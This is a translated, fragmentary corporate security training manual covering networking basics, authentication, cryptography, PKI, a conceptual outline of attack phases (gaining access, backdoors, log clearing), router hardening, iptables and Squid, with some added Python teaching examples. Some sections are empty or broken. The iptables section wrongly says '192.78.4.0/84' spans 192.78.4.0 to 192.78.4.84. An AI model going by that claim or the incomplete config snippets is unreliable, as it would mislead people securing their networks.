Revision history
Date updated: 7/2012
Updated by: Hoàng Tuấn Đạt
Note: First Release
Table of contents (partially recovered)
Purpose of the document ......................................................... 9
Scope of the document ........................................................... 9
Using a sniffer to analyze IP, ICMP, UDP and TCP packets ....................... 22
Authorization .................................................................. 31
Authorization basics ........................................................... 31
Confidentiality ................................................................ 34
Integrity ...................................................................... 35
Availability ................................................................... 35
Basic cryptography ............................................................. 36
Hash functions ................................................................. 36
Targets of attack types ........................................................ 45
Installation ................................................................... 68
Configuring Squid .............................................................. 70
Configuring the Access Point and VPN Server 2003 ............................... 83
Intrusion detection and prevention systems (IDS/IPS) .......................... 100
Overall process for building a general policy ................................. 159
Basic example ................................................................. 188
Lab: using IBM AppScan to scan for web vulnerabilities ........................ 234
Professional data analysis model for enterprises .............................. 235
Using Wireshark to analyze packets and network traffic ........................ 248
Glossary of terms (abbreviation / full form); recovered entry: ATTT (An toàn thông tin, information security)
I. PURPOSE AND SCOPE OF THE DOCUMENT
1. Purpose of the document
This is an information security training document for the network operations and administration staff of ABC. It gives trainees the concepts, system models, deployment configurations of the solutions, risk management, and other information security knowledge.
2. Scope of the document
This document is written specifically for the information security course for ABC staff.
II.
Chapter outline (partially recovered): 2. Basic networking; 5. Authorization; 8. Basic cryptography
The Institute for Security and Open Methodologies defines security as a form of protection in which a separation is created between the assets and the threats.
2. Basic networking
a. The OSI network model
When an application or service runs to serve users' information exchange needs, the network operates so that the exchange follows its own set of rules.
Looking at a network cable or at wireless equipment, a person cannot see the principles by which information is transmitted. To make those principles easy to understand, and to support research, application development and network troubleshooting, the international standards body adopted the OSI model as an ISO standard.
The OSI model (Open Systems Interconnection Reference Model, abbreviated OSI Model or OSI Reference Model), roughly translated as the reference model for interconnecting open systems, is a layered design that describes in abstract terms the technique for communication between computers and the design of the network protocols between them. It was developed as part of the Open Systems Interconnection initiative launched by ISO and the ITU-T. It is also called the seven-layer OSI model. (Source: Wikipedia)
Purpose of the OSI model:
The OSI model divides the functions of a protocol into a series of layers. Each layer has the property that it uses only the functions of the layer below it and exposes its own functions only to the layer above it. A system that implements protocols made up of such a series of layers is called a "protocol stack". A protocol stack can be implemented in hardware, in software, or in a combination of the two. Usually only the lower layers are implemented in hardware, while the others are implemented in software.
The OSI model is respected by the networking and IT industry only to a relative degree. Its main feature is the specification of the interfaces between layers, that is, the specification of how the layers communicate with each other. This means that even when the layers are written and designed by different vendors or companies, they work together harmoniously once assembled (assuming the specifications are interpreted correctly). In the TCP/IP community these specifications are known as RFCs (Requests for Comments); in the OSI community they are ISO standards.
Usually the implementation of a protocol is arranged in layers, just like its specification, but there are exceptions, known as "fast paths". In a fast-path design, the most common transactions the system permits are implemented as a single component in which the functions of several layers are merged into one.
Dividing protocol functions logically makes it easier to reason about the function and operation of protocol stacks, which in turn makes it possible to design stacks that are detailed yet highly reliable. Each layer performs and provides services for the layer immediately above it, and requires services from the layer immediately below it. As noted above, an implementation consisting of several layers of the OSI model is usually called a "protocol stack" (for example, the TCP/IP protocol stack).
The OSI reference model is a seven-layer hierarchical structure that defines the requirements for communication between two computers. The model is defined by the International Organization for Standardization in standard number 7498-1
Page | 12 Copyright by Tocbatdat
TCP/IP Model (layers, top to bottom): 4. Application; 3. Transport; 2. Internet; 1. Network Access
IPv4 packet structure
An IPv4 packet consists of a Header and Data. The Header is 160 or 192 bits and the remainder is Data. The address field is 32 bits.
IPv6 packet structure:
An IPv6 packet also consists of two parts, Header and Data. The packet Header is 40 octets (320 bits), of which the IPv6 address is 128 bits.
TCP packet structure:
A TCP packet consists of two parts, Header and Data, with a 192-bit Header.
The three steps of establishing a TCP connection:
+ Step I: The client sends the server a SYN packet
+ Step II: The server replies to the client with a SYN/ACK packet
+ Step III: When the client receives the SYN/ACK it sends the server an ACK packet, and the exchange of data between the two hosts begins.
The four steps of closing a TCP connection:
+ Step I: The client sends the server a FIN ACK packet
+ Step II: The server sends the client an ACK packet
+ Step III: The server in turn sends the client a FIN ACK packet
+ Step IV: The client sends the server an ACK packet and the disconnection between server and client is complete.
UDP packet structure:
A UDP packet consists of two parts, Header and Data, with a 64-bit Header.
ICMP packet structure
Code (8 bits): each Type may have its own specific codes describing that form of message.
Port          Service (well-known assignment)
20/21         FTP
22            SSH
23            Telnet
25            SMTP
53            DNS
69            TFTP
80            HTTP
110           POP3
161/162       SNMP
443           HTTPS
445           SMB (Microsoft-DS)
135,137,139   RPC / NetBIOS
1723,500      PPTP / IKE (VPN)
3389          RDP
f. Using a sniffer to analyze IP, ICMP, UDP and TCP packets.
Practice: install Wireshark and Colasoft and use them for analysis
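The packet structures described above (IPv4 header, TCP flags in the three-way handshake, UDP header) can be decoded by hand from the raw bytes a sniffer captures. The following is an added example, not code from the training document; the sample frames are constructed inline and the field layouts follow the IPv4, TCP and UDP header formats.

```python
"""Parse raw IPv4/TCP/UDP headers with struct, as a sniffer would.

Added example (not from the training document): the sample frames below are
constructed inline; field layouts follow RFC 791 (IPv4), RFC 793 (TCP) and
RFC 768 (UDP).
"""
import socket
import struct

# TCP control bits, lowest six bits of the data-offset/flags word.
TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def parse_ipv4(packet: bytes) -> dict:
    """Decode the 20-byte fixed IPv4 header (160 bits) and return fields plus payload."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _ident, _flags_frag, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", packet[:20])
    version = ver_ihl >> 4
    ihl = (ver_ihl & 0x0F) * 4  # header length in bytes (20 without options)
    if version != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not a valid IPv4 packet")
    end = total_len if total_len >= ihl else len(packet)
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
            "proto": proto, "header_len": ihl, "payload": packet[ihl:end]}


def parse_tcp(segment: bytes) -> dict:
    """Decode the 20-byte fixed TCP header and name the control flags that are set."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, _win, _csum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4
    flags = off_flags & 0x3F
    names = [name for bit, name in TCP_FLAGS.items() if flags & bit]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": "/".join(names) or "none", "payload": segment[data_offset:]}


def parse_udp(datagram: bytes) -> dict:
    """Decode the 8-byte (64-bit) UDP header."""
    if len(datagram) < 8:
        raise ValueError("truncated UDP header")
    sport, dport, length, _csum = struct.unpack("!HHHH", datagram[:8])
    return {"sport": sport, "dport": dport, "length": length, "payload": datagram[8:length]}


def describe(packet: bytes) -> str:
    """One summary line per packet, in the style of a sniffer's packet list."""
    ip = parse_ipv4(packet)
    if ip["proto"] == 6:  # TCP
        tcp = parse_tcp(ip["payload"])
        return f"TCP {ip['src']}:{tcp['sport']} -> {ip['dst']}:{tcp['dport']} [{tcp['flags']}]"
    if ip["proto"] == 17:  # UDP
        udp = parse_udp(ip["payload"])
        return f"UDP {ip['src']}:{udp['sport']} -> {ip['dst']}:{udp['dport']} len={udp['length']}"
    return f"IP proto={ip['proto']} {ip['src']} -> {ip['dst']}"


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Build a minimal IPv4 header (checksum left 0) for the constructed samples."""
    total = 20 + len(payload)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 1, 0x4000, 64, proto, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    return header + payload


def build_tcp(sport: int, dport: int, flags: int) -> bytes:
    """Build a 20-byte TCP header with the given flag bits (data offset 5 words)."""
    return struct.pack("!HHIIHHHH", sport, dport, 1000, 0, (5 << 12) | flags, 65535, 0, 0)


# Constructed sample traffic: a TCP three-way handshake to port 80 and a DNS query.
SYN, SYN_ACK, ACK = 0x02, 0x12, 0x10
SAMPLE_PACKETS = [
    build_ipv4("192.168.1.10", "10.0.0.5", 6, build_tcp(51000, 80, SYN)),
    build_ipv4("10.0.0.5", "192.168.1.10", 6, build_tcp(80, 51000, SYN_ACK)),
    build_ipv4("192.168.1.10", "10.0.0.5", 6, build_tcp(51000, 80, ACK)),
    build_ipv4("192.168.1.10", "8.8.8.8", 17,
               struct.pack("!HHHH", 40000, 53, 8 + 12, 0) + b"\x00" * 12),
]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        print(describe(pkt))
```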
Identification: the process of identifying the user; the user provides information to the system so that it can identify them.
PAP -
Kerberos
An authentication method in which the user name and password are not transmitted over the network (for example, Microsoft Active Directory uses Kerberos authentication).
Kerberos authentication can be described like going to the cinema:
+ First, the user must hold authorized credentials (user name and password); to go to the cinema you need money
+ The user requests a service (the viewer wants to see a film showing at a certain time)
+ The user presents their credentials to the authenticator (handing over the money to buy a ticket)
+ The KDC server issues the user a credential for accessing the service (the ticket counter issues the ticket to the buyer)
+ The user takes the issued credential to the service server (the viewer takes the ticket to the screening room, where the ticket checker verifies it).
Kerberos can be described in the following steps:
Multi-factor
An authentication method that uses several factors.
For example, to use a bank's ATM service you need the bank card plus a PIN (that is two-factor authentication). Some services also combine several authentication methods to raise the level of security.
Certificate
An authentication method widely used on the Internet that provides secure authentication for users. When encrypted content is sent, only the Private Key can decrypt it, and the private key is normally never transmitted over the network.
Example of the normal authentication process when a user accesses Gmail:
RSA
RSA is a trusted and secure authentication method for authenticating and transmitting information over the Internet. RSA overcomes some of the drawbacks of Certificate authentication. This method is often used in banking transactions.
Biometric
An authentication method that uses biometrics to identify the user, such as fingerprints, veins, iris, voice or face.
5. Authorization
a. Authorization basics
Authorization (in Vietnamese: sự cấp quyền, the granting of rights) is the granting of rights to a user within a system after the user has authenticated (Authentication).
Authorization expresses the rights a user can exercise on the system.
Authorization works directly with access control (Access Control).
Example: in the Windows authorization system, after the user logs in (Authentication) the system grants rights on:
- Files and folders, through NTFS permissions: read, write, delete, modify. These are the rights the user is granted on the files and folders.
IEEE 802.1x is a standard for wireless; it uses port-based access that depends on the service providing authentication and authorization, such as RADIUS and TACACS+. This protocol can be used to secure the WPA/WPA2 protocols.
IPsec is also a fairly popular protocol used together with IEEE 802.1x to provide security for the network.
a. Confidentiality
Confidentiality of information is the level of security needed to ensure that important data is not leaked or disclosed.
b. Integrity
Integrity of information is the level of security needed to ensure that information can be trusted: it is not altered, and it is modified only by authorized persons.
An attacker can use many methods to alter the information they want. These methods may be intrusions that bypass the authentication process, or attacks that exploit security vulnerabilities in the system.
This is an important level of information security; every year many organizations and businesses have their vulnerabilities exploited and their data altered.
Integrity of information is represented by the MODIFY right.
c. Availability
(Figure: "Let me access your data" / "Turn my computer on first")
Availability of information is very important; it reflects the readiness of the services to serve requests.
The availability of a system is affected by many components: hardware, software, or the backup system.
System availability also has to be planned on the basis of the number of users and the importance of the data.
8. Basic cryptography
a. Basic concepts of cryptography
A cipher system provides a method of protecting information by encrypting it into a form that can be read only by someone authorized by the system or by a specific user. The use and creation of such systems is called cryptography.
Cryptography has been used since very early in human history; before information technology existed, many encryption methods were in use.
Examples: Bible ciphers, the Caesar cipher, and in the Second World War the German army used mechanical cipher machines to protect letters sent from the battlefield.
The information technology field has the following basic cryptographic methods:
- Hash functions (HASH)
- Symmetric encryption
- Asymmetric encryption
Encrypt: the process of encryption
b. Hash functions
A hash is a method or algorithm used to check the integrity of data, that is, to detect changes to the data.
The two best-known hash algorithms are SHA and MD5.
When data is transmitted over a network or stored, it can be altered. A recipient who wants to check whether the data is still intact only needs to compare the hash of the original data with the hash of the data received. Using the hash function this way, if the two hashes are identical the data is intact and has not been modified, and vice versa.
Practice: use MD5 to hash a file
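The integrity check described above, as an added example (not code from the training document): hash a file in chunks, compare the digest against a reference value, and confirm that a one-byte change is detected. MD5 is included because the exercise uses it; SHA-256 is the digest to rely on today, since MD5 collisions are practical. The sample file content is constructed.

```python
"""Verify file integrity with a hash, as described in the Hash section.

Added example (not from the training document). It hashes a file in chunks
(so large files need not fit in memory), compares the digest against a
reference value in constant time, and shows that a one-byte change to the data
produces a different digest. Sample data are constructed inline.
"""
import hashlib
import hmac
import os
import tempfile


def file_digest(path: str, algorithm: str = "sha256", chunk_size: int = 65536) -> str:
    """Return the hex digest of the file at `path` using the named hashlib algorithm."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_file(path: str, expected_hex: str, algorithm: str = "sha256") -> bool:
    """True if the file's digest matches the reference value published by the sender.

    hmac.compare_digest avoids leaking how many leading characters matched.
    """
    return hmac.compare_digest(file_digest(path, algorithm), expected_hex.lower())


def tamper_demo() -> dict:
    """Write a constructed file, record its digests, alter one digit, and re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "report.txt")
        original = b"Transfer 1000 to account 12345\n"  # constructed sample content
        with open(path, "wb") as f:
            f.write(original)
        reference_md5 = file_digest(path, "md5")
        reference_sha256 = file_digest(path, "sha256")
        intact = verify_file(path, reference_sha256)

        # Simulated alteration in transit: one digit changes, 1000 -> 9000.
        with open(path, "wb") as f:
            f.write(original.replace(b"1000", b"9000"))
        still_valid = verify_file(path, reference_sha256)
        md5_after = file_digest(path, "md5")

    return {
        "intact_before": intact,               # True: digest matches the reference
        "intact_after": still_valid,           # False: the change is detected
        "md5_changed": md5_after != reference_md5,
        "md5_len": len(reference_md5),         # 32 hex chars (128 bits)
        "sha256_len": len(reference_sha256),   # 64 hex chars (256 bits)
    }


if __name__ == "__main__":
    for key, value in tamper_demo().items():
        print(f"{key}: {value}")
```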
c. Symmetric encryption
Symmetric Key Cryptography is a cryptosystem that uses a single key for both encryption and decryption.
This method has the advantage of being easier to use and integrate than asymmetric encryption, and encryption and decryption are also faster than with asymmetric encryption. However, because both encryption and decryption use the same key, the key is usually pre-configured at both ends, sender and receiver (e.g. IPsec), or the shared information is encrypted so that only those who hold the key can open it.
Symmetric encryption is usually used to encrypt data, while asymmetric encryption is usually used for authentication and key exchange.
There are many symmetric algorithms, but the most widely used today is AES (Advanced Encryption Standard).
d. Asymmetric encryption
Asymmetric Key Cryptography is a cryptosystem that uses a key pair, a Public Key and a Private Key, for encryption and decryption.
Usually such a system uses the Public Key to encrypt and the Private Key to decrypt:
The PKIX Working Group of the IETF developed the Internet standard for PKI based on the X.509 standard and certificates, with a focus on:
- Operational Protocols
Whereas PKIX was developed on the basis of the Internet standard X.509, the Public Key Cryptography Standards (PKCS) are data encryption standards developed and published by RSA Labs, now part of RSA. There are 15 specific PKCS documents, for example:
- PKCS #1 RSA Cryptography Standard: provides recommendations for implementing public-key cryptosystems based on the RSA algorithm
- PKCS #15:
The CA is an important component of the PKI concept. CA providers include VeriSign and Entrust. It is the system that issues certificates.
- Digital Certificates
A digital certificate is data containing public-key cryptographic material; most certificates follow the structure of the X.509 standard. It includes
Certificate Policies
The policy for digital certificates, identifying how the certificates are used. It covers specifics such as:
How information is protected with the CA
The method of authenticating to the CA
Key management
Management of Private Key use
Validity period of the certificate
Renewal
Whether the private key may be exported
Minimum length of the Public Key and Private Key
In the example above VeriSign is the CA, Thawte SGC CA is the CSP, and the certificate information is used for Google's accounts service.
- Trust models
The simplest PKI structure has a single CA. One CA in the structure can create and manage certificates, but this model suits only small organizations because of its simplicity: if the CA fails, every system using the service fails with it. To reduce this risk, a PKI allows a hierarchy to be built with a Root CA at the top and tiers of subordinate CAs below it; the subordinate CAs are managed so that when one fails it can be rebuilt simply. These are the Trust Models.
a. Basic steps of an attack
An attack is usually divided into the following basic steps:
Step 2: Scan
The second step is carried out once the target has been identified. Scanning aims to identify the weaknesses of the target, from which a list of every element that could be used to break into the system is drawn up.
Step 3: Gaining Access
Having discovered the weaknesses of the system, the attacker chooses one or more vulnerabilities from which to attack and take control.
Step 4: Maintaining Access
After a successful attack, to make later access to the system easier, the attacker often uses viruses, trojans, backdoors or pieces of shellcode.
Step 5: Clearing Tracks
The attacker erases the traces of their access, such as by deleting logs.
Threat
An action or situation that can affect security. A threat is a risk that affects the security of the system.
Vulnerability
A security weakness in the system.
Target of Evaluation
An IT system that is the target of the attack.
Attack
Attacks on a network can be divided into two forms:
+ Active Attack
+ Passive Attack
Attacks on a system can also be divided into many other types. Obtaining information, altering information or destroying information are the most basic goals of attacks.
Exploit
The act of exploiting a security vulnerability.
Brute Force
An attack in which the attacker tries simple passwords one after another to guess the user's password. This method works only against simple passwords.
Dictionary
An attack similar to brute force, but instead of trying passwords one by one the attacker uses a dictionary of candidate passwords.
Spoofing
DoS
A form of attack in which a person or system makes another system inaccessible, or significantly slower, by exhausting its resources.
Man-in-the-middle
The attacker by some means places themselves in the middle of the communication between two computers.
Replay
Example: an authentication process completes successfully and the attacker has captured it. When they need to log in to the system, the attacker replays the captured traffic to authenticate. That is a replay attack.
Session Hijacking
After a user has successfully authenticated, the attacker takes over the communication session. This form of attack is Session Hijacking.
d. Targets of attack types
Attacks are classified by what they target:
o Operating System: the target is the operating system. Today's operating systems are very complex, with many services, ports and access modes. Patching vulnerabilities grows ever more complex and sometimes updates are not applied. The attacker exploits the vulnerabilities in those operating systems.
o Application: the target is applications. Applications are developed by independent software vendors who sometimes care only about meeting the application's business needs and forget to secure it. Many applications have vulnerabilities that hackers can exploit.
o Shrink Wrap: programs and applications sometimes have their source code exposed, and this too is a very large vulnerability.
o Misconfiguration: incorrect settings on the system sometimes create gaps that the attacker exploits.
III.
Required features / Features
Example 1: We cannot build a multi-million-dollar solution to protect an unimportant personal computer.
Example 2: We need to protect a web system; there is no need for Endpoint security features there.
Example 3: We cannot give up 50% of the system's performance to protective software.
No business or organization can deploy every security solution at once, which is why a clear roadmap is needed. The roadmap must provide full coverage and compatibility between the solutions, avoiding overlap and conflict. An organization can rely on such a roadmap to build an IT infrastructure that meets its security requirements.
Below is the roadmap of steps, and the solutions, for building a network with a high level of security
4. Routers and switches
a. Router functions
- Routing: routes packets on the network
- NAT: translates IP addresses from private to public and vice versa
- Access Control List: lets the administrator create access control lists that block ports and IP addresses.
b. Switch functions
- Switches packets at Layer 2
c. Security on the switch
- VLANs: allow several networks to be created on one switch, containing outbreaks of viruses and other attacks.
- Port Security: binds a fixed set of MAC addresses to a given switch port, which blocks attacks such as MAC spoofing and ARP spoofing.
d. Security on the router
- The router is a very important device in the network model; it routes, performs NAT and creates ACLs to protect the network from the gateway layer.
Lab: install Packet Tracer 4.0 and test some router commands.
Understanding Access Control Lists
On a Cisco router, a (standard) access list, which applies only to IP addresses, is created with the command:
Create and apply an Extended Access Control List (which can be applied to ports as well as IP addresses).
By reviewing the logs on the router we can see what the system blocked and who accessed the router.
e. Configuring security on the router
Set an IP address on an interface:
Router> Enable
Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#
Router#config terminal
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router
Router#configure terminal
Router(conf)#^Z
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#line vty 0 4
Router(config-line)#login local
Router(config-line)#exit
Router(config)#
Router#configure terminal
Choose the size of the key modulus in the range of 360 to 2048
[OK]
Router(config)#
Router#configure terminal
Router(config)#^Z
Router#configure terminal
Router(config)#^Z
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#^Z
MarketingRouter#config terminal
20.0.20.1
MarketingRouter(config-line)#^Z
MarketingRouter#
FinanceRouter#config terminal
FinanceRouter(config-line)#^Z
FinanceRouter#
LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)^Z
LEFT#
Router#config terminal
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip unreachables
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config)#interface Serial 1
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Protecting against source routing
Router#config terminal
Router(config)#no ip source-route
Router(config)#^Z
Router#
Small Services
Router#config terminal
Router(config)#^Z
Router#
Blocking finger
Router#config terminal
Router(config)#^Z
Router#
Router#config terminal
Router(config)#no ip finger
Router(config)#^Z
Router#
Router#config terminal
Router(config)#no ip name-server
Router(config)#no snmp-server
Router(config)#^Z
Controls users and their access. Controls content
A packet filter permits or denies each packet it receives. It examines the packet to decide whether it satisfies one of the packet-filtering rules. These rules are based on the information at the start of each packet (the header), the same information used to forward the packet across the network, including:
Source IP address (Source)
Destination IP address (Destination)
Transport protocol (TCP, UDP, ICMP, IP tunnel ...)
Source TCP/UDP port
Destination TCP/UDP port
ICMP message type
Incoming interface
Outgoing interface
A firewall can also extract data from Layers 6 and 7 of the packet: file type, URL, content, services, application, user, ...
d. Types of firewall
By placement:
- Network Firewall: protects the whole network
- Host Firewall: protects the computer it is installed on (usually built into the OS or into security software such as Anti-Virus or Endpoint Security).
- Web Firewall: may be a network firewall or a host firewall whose function is to protect web services against attacks.
By hardware or software platform:
- Software Firewall: usually installed on an OS, or a Linux operating system with an integrated software firewall
- Hardware Firewall: optimized by building the operating system on the vendor's hardware platform, giving better processing performance.
By packet processing capability:
- Packet Filter: operates at Layers 3 and 4 of the OSI model. It filters packets at these two layers; a firewall of this type can be regarded as an access control list on a router.
Has the basic firewall features: Packet Filter, NAT, Stateful inspection, VPN
Supports network discovery (active hosts, services, applications, OS, vulnerabilities).
Deeply integrated IPS (allows configuration, rule editing, Event Impact Flag)
Protocol   Service
TCP        FTP
TCP        SSH
TCP        TELNET
TCP        SMTP
TCP        NAME (DNS)
TCP        FINGER
TCP        HTTP
TCP        POP3
TCP        SUNRPC
TCP        HTTPS
TCP        SAMBA-SWAT
TCP        KDM
TCP        MYSQL
TCP        X11
Then, when Yahoo sends a reply packet back to your machine, it too has to pass through the INPUT chain. Of course it has to match the rules before it is allowed into your machine. As troublesome and complicated as customs at Nội Bài airport, right?
Let's start working with specific IP addresses. Say you want to block every packet coming from 192.78.4.0.
-s is the option that matches a source IP address or DNS name. So we have the command:
iptables -A INPUT -s 192.78.4.0
If you want to handle the packets in more detail, the -j option lets you do that, with ACCEPT, DENY or DROP (used together with the -s option). I probably don't need to give the Vietnamese meaning of the three words ACCEPT, DENY and DROP. If you want to DROP packets from 192.78.4.0:
iptables -A INPUT -s 192.78.4.0 -j DROP
DENY and ACCEPT work the same way ;-p
The command above ignores everything coming from 192.78.4.0.
We can also ignore one particular PC on a network. If you don't want the PCs on the network to talk to that PC, or that PC to talk to the outside, you only need to change the INPUT/OUTPUT parameter and the -s and -d options.
Suppose we want to ignore Telnet requests from that PC. In this case at least three protocols can be specified: TCP, UDP and ICMP.
The -p option specifies the protocol to handle. Telnet runs on port 23/TCP, so the command is:
iptables -A INPUT -s 192.78.4.0 -p tcp --dport telnet -j DROP
The commands above act on a single IP address. If you want to act on several IP addresses at once (multiple IPs), there is a small change, as follows:
- 192.78.4.0/84 ==> all IPs from 192.78.4.0 to 192.78.4.84
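The header criteria from the packet-filter section (source/destination address, protocol, ports, ICMP type, in/out interface) and the first-match walk of an iptables INPUT chain described in this section can be modelled in a few dozen lines. The following is an added example, not code from the training document or from the iptables project; rules and packets are constructed. Note that in CIDR notation the number after the slash is a prefix length (0 to 32 for IPv4), so 192.78.4.0/24 covers 192.78.4.0 through 192.78.4.255.

```python
"""A minimal stateless packet filter with iptables-like first-match rules.

Added example (not from the training document or the iptables project). It
evaluates the header fields the firewall section lists (source/destination
address, protocol, source/destination port, ICMP type, in/out interface)
against an ordered rule list with a default policy, the way an INPUT chain is
walked. Sample rules and packets are constructed inline.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

ACCEPT, DROP = "ACCEPT", "DROP"


@dataclass(frozen=True)
class Packet:
    """The header fields a packet filter looks at (no payload)."""
    src: str
    dst: str
    proto: str                       # "tcp", "udp" or "icmp"
    sport: Optional[int] = None
    dport: Optional[int] = None
    icmp_type: Optional[int] = None
    in_iface: Optional[str] = None
    out_iface: Optional[str] = None


@dataclass(frozen=True)
class Rule:
    """One rule; each optional criterion corresponds to an iptables match option."""
    target: str                       # like -j
    src: Optional[str] = None         # CIDR, like -s (prefix length, not an end address)
    dst: Optional[str] = None         # like -d
    proto: Optional[str] = None       # like -p
    sport: Optional[int] = None       # like --sport
    dport: Optional[int] = None       # like --dport
    icmp_type: Optional[int] = None   # like --icmp-type
    in_iface: Optional[str] = None    # like -i
    out_iface: Optional[str] = None   # like -o

    def matches(self, pkt: Packet) -> bool:
        """Every criterion set on the rule must match; unset criteria match anything."""
        if self.src is not None and ip_address(pkt.src) not in ip_network(self.src, strict=False):
            return False
        if self.dst is not None and ip_address(pkt.dst) not in ip_network(self.dst, strict=False):
            return False
        for field in ("proto", "sport", "dport", "icmp_type", "in_iface", "out_iface"):
            want = getattr(self, field)
            if want is not None and getattr(pkt, field) != want:
                return False
        return True


class Chain:
    """An ordered rule list; the first matching rule decides, else the policy applies."""

    def __init__(self, policy: str = DROP):
        self.rules: List[Rule] = []
        self.policy = policy

    def append(self, rule: Rule) -> None:  # like iptables -A
        self.rules.append(rule)

    def verdict(self, pkt: Packet) -> str:
        for rule in self.rules:
            if rule.matches(pkt):
                return rule.target
        return self.policy


def build_input_chain() -> Chain:
    """Constructed INPUT chain in the spirit of the section: drop telnet from the
    192.78.4.0/24 subnet, allow web traffic to the server on eth0, allow echo
    requests, drop everything else by default policy."""
    chain = Chain(policy=DROP)
    chain.append(Rule(DROP, src="192.78.4.0/24", proto="tcp", dport=23))
    chain.append(Rule(ACCEPT, dst="10.0.0.5", proto="tcp", dport=80, in_iface="eth0"))
    chain.append(Rule(ACCEPT, proto="icmp", icmp_type=8))  # ICMP echo request
    return chain


if __name__ == "__main__":
    chain = build_input_chain()
    samples = [
        Packet("192.78.4.200", "10.0.0.5", "tcp", 40000, 23, in_iface="eth0"),
        Packet("192.78.4.200", "10.0.0.5", "tcp", 40001, 80, in_iface="eth0"),
        Packet("203.0.113.9", "10.0.0.5", "tcp", 40002, 80, in_iface="eth1"),
        Packet("203.0.113.9", "10.0.0.5", "icmp", icmp_type=8),
    ]
    for p in samples:
        print(f"{p.src} -> {p.dst} {p.proto} dport={p.dport}: {chain.verdict(p)}")
```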
There are many excellent scripts on the Internet for configuring iptables rules. You can download them and apply them directly on your system. There are also some tools for configuring iptables under X.
Closing words
Security is always a complex matter that consumes a lot of ink. I hope that after this article you understand and know how to use iptables. Everything is only relative, so if you want to keep your system safe you must always review and check the firewall, the bugs... and always stay on alert at the highest level...
7. Installing and configuring SQUID as a proxy server
a. Linux SQUID Proxy Server:
b. Installation:
Squid's default directories:
/usr/sbin
/etc/squid
/var/log/squid
Installing from source:
+ Given the squid source archive squid-version.tar.gz, run the following commands:
tar xzvf squid-version.tar.gz
cd squid-version
./configure
make
make install
After running the commands above, squid is installed.
c. Configuring Squid:
d. Starting Squid:
After installing and reconfiguring squid, create the cache directories before running squid with the command:
squid -z
Once the cache directories exist, start and stop squid with the init script as follows:
/etc/init.d/squid start
/etc/init.d/squid stop
After squid has started, to monitor and manage client access and see what squid is doing and how it is caching, regularly check the following files:
*** cache_log: contains warnings and status information about the cache
*** store_log: contains the database of what has just been updated in the cache and what has expired
*** access_log: contains all information about client access, including source address, destination, time
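Reviewing access_log is easier with a small parser than by eye. The following is an added example, not code from the training document or from the Squid project: it reads lines in Squid's native access.log format (timestamp, elapsed ms, client, result/status, bytes, method, URL, ident, hierarchy/peer, content type), summarises requests and bytes per client and lists denied requests. The log lines are constructed samples.

```python
"""Summarise a Squid access.log (native format) to review client activity.

Added example (not from the training document or the Squid project). Each line
in Squid's native format is: timestamp elapsed client result_code/status bytes
method URL rfc931 hierarchy/peer content_type. The log lines below are
constructed samples; the parser skips malformed lines instead of failing.
"""
from collections import defaultdict
from datetime import datetime, timezone

SAMPLE_ACCESS_LOG = """\
1341821612.123    245 192.168.1.20 TCP_MISS/200 15320 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
1341821615.004     12 192.168.1.20 TCP_HIT/200 4120 GET http://www.example.com/logo.png - NONE/- image/png
1341821620.456      5 192.168.1.21 TCP_DENIED/403 3821 GET http://blocked.example.net/ - NONE/- text/html
1341821633.900    980 192.168.1.22 TCP_MISS/200 88213 CONNECT mail.example.org:443 - DIRECT/198.51.100.7 -
this line is garbage and must be skipped
1341821640.111      3 192.168.1.21 TCP_DENIED/407 1200 GET http://www.example.com/ - NONE/- text/html
"""


def parse_line(line: str):
    """Return a dict for one native-format line, or None if it does not parse."""
    parts = line.split()
    if len(parts) < 10:
        return None
    try:
        ts = float(parts[0])
        elapsed_ms = int(parts[1])
        result, status = parts[3].split("/", 1)
        size = int(parts[4])
        status_code = int(status)
    except ValueError:
        return None
    return {
        "time": datetime.fromtimestamp(ts, tz=timezone.utc),
        "elapsed_ms": elapsed_ms,
        "client": parts[2],
        "result": result,          # e.g. TCP_MISS, TCP_HIT, TCP_DENIED
        "status": status_code,     # HTTP status code
        "bytes": size,
        "method": parts[5],
        "url": parts[6],
        "hierarchy": parts[8],
    }


def summarise(log_text: str) -> dict:
    """Aggregate per-client requests, bytes and denied requests; collect denied URLs."""
    per_client = defaultdict(lambda: {"requests": 0, "bytes": 0, "denied": 0})
    denied = []
    skipped = 0
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            skipped += 1
            continue
        stats = per_client[entry["client"]]
        stats["requests"] += 1
        stats["bytes"] += entry["bytes"]
        if entry["result"] == "TCP_DENIED":
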